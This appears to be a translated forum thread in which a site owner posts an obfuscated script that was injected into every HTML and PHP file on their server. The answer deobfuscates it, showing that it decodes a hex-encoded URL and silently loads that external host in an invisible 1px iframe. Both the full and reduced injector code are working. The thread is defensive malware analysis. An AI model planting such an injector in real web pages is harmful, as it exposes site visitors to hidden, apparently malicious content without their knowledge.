
由于某种我尚未查明的原因,我服务器上的所有 .html 和 .php 文件都被修改,加入了以下 Javascript(我已使用 http://jsbeautifier.org/ 对其进行了美化):

<script type="text/javascript">
// Part 1 of the injected script: decoy statements mixed with the string table
// that the live code later uses as property names.
// Each `if` compares two different string literals, so it is always false and
// the guarded statement never runs; NEHbsc is never called in this listing.
if ('GulVG' == 'dvLWnC') LCXW = 'ukNoT';
if ('QjTy' == 'OGvoYK') iBPba = 'YmwGf';
// Encoded payload: two hex digits per character. The decode loop later in the
// script subtracts 43 from each byte to rebuild the iframe URL.
// NOTE(review): this literal is a fixed string in this sample and so a candidate
// search marker for other modified files — whether it is identical in every
// infected file is not shown on this page.
var qiyTHJNSK = "939f9f9b655a5a968c9f909e9f8c9f626259a09e5a9499598e92946a64";

function NEHbsc() {
    var RQrwz = 'ufOn';
    if ('Juxm' == 'mHxLm') Niaf();
}
var px1_var = "1px"; // later assigned to the iframe's width and height
var uvWXHd = 'pDito';
if ('skhYX' == 'Gczk') hYkhb();
var rGsu;
var hitxMCSTc = "pa\x72s\x65\x49nt"; // "parseInt"
var WNOgK = "b\x6fdy"; // "body"
var oqHu;
var NPOXa = 39;
var HGBXMBYkq = "co\x6e\x73tructor"; // "constructor"
var CodwDw;
var adBe = 261;
var fmvCwPvf = "\x66\x72o\x6dC\x68ar\x43ode"; // "fromCharCode"
var gmCUwm = 6;
var BcWka = 'prssL';
var SjIk = 'DcwGHM';
var UBzc;
var pubYymvCW = "a\x70\x70en\x64C\x68ild"; // "appendChild"
var EVHJIA = 'nGzZ';
if ('NWGB' == 'XlySU') AWtq();
var LnJbDi = ""; // accumulates the decoded URL
if ('jUcBg' == 'tFKsdn') fRhEH = 'PEeA';
var LgLiBeb = "\x73li\x63e"; // "slice"
if ('cXqZe' == 'hdvrt') KIkyJ();
var appVersion_var = "\x61ppV\x65r\x73i\x6fn"; // "appVersion"
var DaGd = 'WJdpuS';
var UNLOOk = 118;
var px0_var = "0\x70x"; // "0px", later assigned to the iframe's top and right
var yufL = 268;
if ('vlwmVU' == 'dtNS') dFobAh = 'dbES';
// Obtains the global object without naming it: the function is called as a
// plain function and returns `this`, which in non-strict code is the global
// object (no 'use strict' directive appears in this listing).
// Only `return this` matters; HMtGY, the two locals and FeZd (declared after
// the return and never called) are filler.
var coiJVUL = (function () {
    function HMtGY() {}
    var JWuN = 'Dztvmh';
    var JZEGM;
    return this;

    function FeZd() {
        var IZZFyk = 'LOij';
        if ('SomCO' == 'VtLBbq') uThvZ();
    }
})();

// Decoy: utrcTc is never called in this listing and its `if` is always false.
function utrcTc() {
    var sQqTc = 'GDjGUL';
    if ('GGbJ' == 'CdUOt') PFLkIv();
}
var yILQN;
// HGBXMBYkq holds "constructor", so this reads the constructor of a string
// literal, i.e. String. The literal's text is irrelevant; the decode loop uses
// the result to reach fromCharCode without writing `String` in the source.
var BlpVKOn = "GJfIbBp" [HGBXMBYkq];
var Cspfjl = 'cRBOTm';
var AhJvb;
// Decode loop: walks the hex payload two characters at a time, parses each pair
// as base 16 via the global object's parseInt, subtracts 43, and appends the
// resulting character to LnJbDi. For this sample the decoded value is the
// address reported in the analysis on this page:
// http[evil]://katestat77.us/in.cgi?9
for (var naxoJ = 0; naxoJ < qiyTHJNSK.length; naxoJ += 2) {
    function mthsyA() {}
    // No `var`: coesFKAJH is created as an implicit global.
    coesFKAJH = coiJVUL[hitxMCSTc](qiyTHJNSK[LgLiBeb](naxoJ, naxoJ + 2), 16) - 43;
    var ihta;
    // BlpVKOn[fmvCwPvf] resolves to String.fromCharCode.
    LnJbDi += BlpVKOn[fmvCwPvf](coesFKAJH);
    if ('YwvB' == 'nLaBq') FxCUcY = 'LClI';

    function LuHhQ() {}
    if ('rLTy' == 'RGZAH') InLSa = 'hqGi';
}
// Mostly filler: unused variables, functions that are never called, and an
// always-false `if`. Two values are used later in the script: NLauPPxo (the
// name given to the iframe) and SCQFe (the argument for document.createElement).
var pRLWk = 'qYTdKF';
var dbQz = 'IuaOpO';
var NLauPPxo = "KXDDhcUB"; // iframe name attribute

function WiKx() {
    var RqlT = 'TnwXV';
    if ('mGATZ' == 'BoFZqb') IaMIR();
}
var KVmoXu = 'CCmbz';
var fpSlvS;

function kIyvYK() {
    var kejS = 'hRGKfF';
    if ('dwlh' == 'PerQmS') NeWE();
}
var HukG = 171;
var SCQFe = ""; // filled in by the browser check that follows
var ZSeQP;
if ('TYhSD' == 'pOHCUl') xDKJc();
var QgUskg = 165;
// Browser check on navigator.appVersion: when it contains "MSIE", SCQFe becomes
// a complete <iframe ...> tag with name and src already filled in; otherwise it
// is just the tag name "iframe". Everything else in both branches is filler.
// NOTE(review): presumably the first branch relies on legacy Internet Explorer
// accepting markup in document.createElement — confirm before relying on it.
if (navigator[appVersion_var].indexOf("MSIE") != -1) {
    var XGZk = 162;
    var dQaQT;
    SCQFe = '<iframe name="' + NLauPPxo + '" src="' + LnJbDi + '">';

    function cxMsRj() {
        var gRqlMJ = 'YxSQd';
        if ('Yedbfb' == 'FmRTE') zMRsf();
    }
    if ('UFqh' == 'inxzUL') IMhGyA();
    var LnEoLC;
} else {
    function NBxX() {
        var rUxrb = 'oyDIE';
        if ('trsJw' == 'EffuZz') zIRGF();
    }
    var pZBDH = 'FbTqY';
    SCQFe = 'iframe';
    if ('qJQEx' == 'sEOu') Jjcc();
    var LtKfoR;
}
// Builds and styles the iframe. The live statements are the createElement call,
// the REKhC helper and its invocation, the name assignment and the five style
// assignments; every function declared in between is empty or guarded by an
// always-false `if`, and none of them is called in this listing.
// Net effect of the styling: an absolutely positioned 1px-by-1px frame at
// top 0px / right 0px, which is why the frame is effectively invisible.
var RHgYbw = 209;
var XGCxE = document.createElement(SCQFe);
var osIEg = 'zpisyX';
var yTDi;
// Custom method attached to the element: points its src at the decoded URL.
XGCxE.REKhC = function () {
    var EhIV;
    this["src"] = LnJbDi;
    var hITyC = 47;

    function QPAbon() {
        var vlUKyt = 'ydOwpE';
        if ('bUzfeI' == 'Gtzuz') xqXIgA();
    }
}

function uNdxy() {}
if ('tXIjw' == 'ZuZUXu') TJmV = 'OZLhL';
XGCxE.style.right = px0_var;
var INwC = 218;

function eXRqv() {}
XGCxE.style.position = "absolute";
var myUH = 129;
var itYaqs = 'PIEQTG';
XGCxE.style.height = px1_var;

function Cncutd() {
    var rElSS = 'aVJgKV';
    if ('OlroM' == 'QRUVc') ZSoo();
}
if ('RpUI' == 'UbjbH') DfFH = 'LQKPT';

function jpdw() {}
XGCxE.name = NLauPPxo;

function GZKiB() {
    var HGDCTk = 'uDGc';
    if ('FdUgR' == 'hVIV') dcxx();
}
function vaVVBx() {
    var PFhZz = 'CWQbMT';
    if ('gEEvG' == 'aPzLMo') dMSclV();
}
// Sets the frame's src to the decoded URL.
XGCxE.REKhC();

function eInNvF() {}

function gPMoah() {
    var UrmQn = 'fnwS';
    if ('RJhZkZ' == 'NoYtxc') lkhw();
}
var xFoDke = 185;
XGCxE.style.top = px0_var;

function LXpA() {}

function Qkls() {
    var rwmtT = 'RLulmG';
    if ('mvum' == 'mQYG') RSKN();
}
XGCxE.style.width = px1_var;
var OMySFE = 'AJgrgE';

function yvFj() {}

// Inserts the prepared iframe into the page. If document.body exists, the frame
// is appended through body.appendChild (called via apply, with the property
// names taken from the string table); otherwise the function schedules itself
// again after 120 ms and retries. The nested functions, extra variables and
// always-false `if` statements are filler.
function YzJdttK() {
    function nWCtr() {
        var HbXEi = 'cssMz';
        if ('gwMUm' == 'fJUX') Jblip();
    }
    var kNePZX;
    if (document[WNOgK]) {
        if ('Mwub' == 'FLNDO') TdNEy = 'WAnb';
        var AfhI = 'gdwUZG';
        var UdZQcB;
        var document_body_var = document[WNOgK];
        if ('mjKa' == 'hCEFj') Vmkvz();
        if ('knkq' == 'QLKklH') ygHF();
        // Equivalent to document.body.appendChild(XGCxE).
        document_body_var[pubYymvCW].apply(document_body_var, [XGCxE]);

        function jbGXOJ() {
            var ovQXvi = 'HTXX';
            if ('fllkOR' == 'OQlK') xGgRO();
        }
    } else {
        var jJJY = 67;
        // The body is not available yet: retry in 120 ms.
        setTimeout(YzJdttK, 120);
        var fvmrr = 'HIfEiu';

        function KvOj() {
            var gLdJK = 'XueY';
            if ('ppiCfu' == 'xudev') ZqGbGK();
        }
    }
    var qUvxeh;
}
var EKFO = 10;
var rbiRyL;
// The only live statement here: starts the iframe insertion. The variables and
// the uJgk function around it are filler (uJgk is never called in this listing).
YzJdttK();

function uJgk() {
    var QbDju = 'lEEFak';
    if ('jBDVr' == 'OzMogy') EHbmqV();
}
var Jslsu = 'BXWm';
</script>

有人可以帮我解读这段代码吗?另外,我怎样才能查出它是如何被植入的,有没有办法追溯来源?

干杯!


1 回答 1


去掉所有无用的 var 声明和条件恒为假的 if 语句之后,实际执行的代码是:

// Reduced form of the injected script with the dead code stripped out.
// This excerpt is not self-contained: appVersion_var, NLauPPxo, SCQFe, px0_var,
// px1_var and pubYymvCW are used below but declared only in the original
// listing ("appVersion", "KXDDhcUB", "", "0px", "1px" and "appendChild" there).

// Encoded iframe URL: two hex digits per character, each byte offset by 43.
var qiyTHJNSK = "939f9f9b655a5a968c9f909e9f8c9f626259a09e5a9499598e92946a64";

var HGBXMBYkq = "co\x6e\x73tructor"; // constructor
var fmvCwPvf = "\x66\x72o\x6dC\x68ar\x43ode"; // fromCharCode
var BlpVKOn = "GJfIbBp" [HGBXMBYkq]; // String (the constructor function)
var hitxMCSTc = "pa\x72s\x65\x49nt"; // parseInt
var WNOgK = "b\x6fdy"; // body
var LgLiBeb = "\x73li\x63e"; // slice
var LnJbDi = ""; // accumulates the decoded URL

// Returns `this` from a plain function call: the global object in non-strict code.
var coiJVUL = (function () {
    return this;
})();

// Decode: parseInt(hexPair, 16) - 43, then String.fromCharCode, appended to LnJbDi.
for (var naxoJ = 0; naxoJ < qiyTHJNSK.length; naxoJ += 2) {
    coesFKAJH = coiJVUL[hitxMCSTc](qiyTHJNSK[LgLiBeb](naxoJ, naxoJ + 2), 16) - 43;
    LnJbDi += BlpVKOn[fmvCwPvf](coesFKAJH);
}

// When appVersion contains "MSIE" a full <iframe> tag string is passed to
// createElement; otherwise only the tag name is.
if (navigator[appVersion_var].indexOf("MSIE") != -1) {
    SCQFe = '<iframe name="' + NLauPPxo + '" src="' + LnJbDi + '">';
} else {
    SCQFe = 'iframe';
}
var XGCxE = document.createElement(SCQFe);

// Helper attached to the element: sets its src to the decoded URL.
XGCxE.REKhC = function () {
    this["src"] = LnJbDi;
};

// Styling below yields an absolutely positioned 1px-by-1px frame at top/right 0px.
XGCxE.style.right = px0_var;

XGCxE.style.position = "absolute";

XGCxE.style.height = px1_var;

XGCxE.name = NLauPPxo;

XGCxE.REKhC();

XGCxE.style.top = px0_var;

XGCxE.style.width = px1_var;

// Appends the frame to document.body, retrying every 120 ms until the body exists.
function YzJdttK() {

    if (document[WNOgK]) {

        var document_body_var = document[WNOgK];

        document_body_var[pubYymvCW].apply(document_body_var, [XGCxE]);

    } else {

        setTimeout(YzJdttK, 120);
    }
}

YzJdttK();

因此,它做的事情和这类脚本通常做的一样:向页面追加一个不可见的 iframe;在您的情况下,该 iframe 的地址是 http[evil]://katestat77.us/in.cgi?9。脚本本身无法说明文件是如何被篡改的;要追溯入侵途径,需要查看被改文件的修改时间以及服务器上对应时间段的访问日志。

于 2012-09-26T14:38:54.277 回答